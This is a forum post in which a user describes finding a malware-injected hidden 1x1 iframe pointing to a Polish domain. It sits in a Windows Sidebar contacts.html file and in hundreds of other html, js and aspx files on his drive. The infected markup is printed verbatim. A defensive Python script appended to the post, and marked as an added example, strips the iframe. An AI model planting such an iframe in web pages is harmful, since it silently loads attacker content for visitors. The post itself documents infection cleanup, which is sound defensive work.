UPDATE:
Re: The last visible sign of the infections - The block of attempted access to jl.chura.pl/ru
I had shut down the Sidebar & stopped it loading on startup & I no longer got the message about attempted access of the site.
I then did a little search for jl.chura in the contents of the sidebar folder's files & it flagged up contacts.html in the 'Contacts' widget folder.
When I searched in the file, though, it said not found. I scrolled through it and found an obfuscated link to the site at the bottom:
<!--
////////////////////////////////////////////////////////////////////////////////
//
// THIS CODE IS NOT APPROVED FOR USE IN/ON ANY OTHER UI ELEMENT OR PRODUCT COMPONENT.
// Copyright (c) 2006 Microsoft Corporation. All rights reserved.
//
////////////////////////////////////////////////////////////////////////////////
-->
<html>
<head>
...
...
</head>
<body onLoad="myOnLoad();" scroll="no">
.....
.....
<div id="L_LOCEARCHWORD_text" style="display:none">Search</div>
<iframe src="http://jL.chUra.pl/rc/" width=1 height=1 frameborder=0></iframe>
</body>
<script src="js/contacts.js" type="text/javascript" language="javascript"></script>
</html>

So every time Windows loaded & the Sidebar started up it linked to the chura site.
I then did the same search on the whole drive & it flagged 458 files - Mostly html, js, & aspx.
Apart from a few binary files (that I'm still trying to find out why they were flagged as the text appears nowhere inside when viewed as text) they all contain the same iframe block inserted near the end of any body block.
Now all I have to do is remove the link from all these files...
I wish I could remember more grep commands than I can...
Once these links are gone - I think I'm clean.
Anyone got a script I can give a list of files & a line of text to be removed to?
Regards,
Paul
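
Added example, not part of the original post: a cleanup script for the request above that removes the injected iframe block shown in contacts.html from text files under a folder, matching the host case-insensitively because the injected copy is written "jL.chUra.pl". The function names, the list of file types and the backup suffix are assumptions of this example; files that match but look binary or have another extension are only listed for manual review, never rewritten.

```python
import re
import shutil
import sys
from pathlib import Path

# Host comes from the post. Case-insensitive on purpose: the injected copy is
# written "jL.chUra.pl", which is why a case-sensitive search reported nothing.
IFRAME_RE = re.compile(
    rb"<iframe\b[^>]*\bsrc\s*=\s*[\"']?https?://jl\.chura\.pl\b[^>]*>\s*</iframe>[ \t]*\r?\n?",
    re.IGNORECASE,
)
TEXT_SUFFIXES = {".html", ".htm", ".js", ".aspx"}  # assumed list of editable types
BACKUP_EXT = ".pre-clean.bak"                      # hypothetical backup suffix


def strip_iframe(data):
    """Return (cleaned_bytes, count) with every matching iframe removed."""
    return IFRAME_RE.subn(b"", data)


def clean_tree(root, dry_run=True):
    """Walk root; clean text files, list anything else that matches for review."""
    report = {"cleaned": [], "review": []}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.name.endswith(BACKUP_EXT):
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # locked or unreadable file: skip rather than abort the run
        cleaned, hits = strip_iframe(data)
        if hits == 0:
            continue
        # Binary or unexpected file types are reported, never rewritten.
        if path.suffix.lower() not in TEXT_SUFFIXES or b"\x00" in data:
            report["review"].append(path)
            continue
        if not dry_run:
            shutil.copy2(path, path.with_name(path.name + BACKUP_EXT))
            path.write_bytes(cleaned)
        report["cleaned"].append(path)
    return report


if __name__ == "__main__":
    # Usage: python clean_iframe.py <folder> [--apply]   (dry run by default)
    result = clean_tree(sys.argv[1], dry_run="--apply" not in sys.argv[2:])
    for kind, paths in result.items():
        for p in paths:
            print(kind, p)
```

Run it without --apply first and read the "cleaned" and "review" lists before letting it rewrite anything; each rewritten file keeps an untouched copy beside it with the backup suffix.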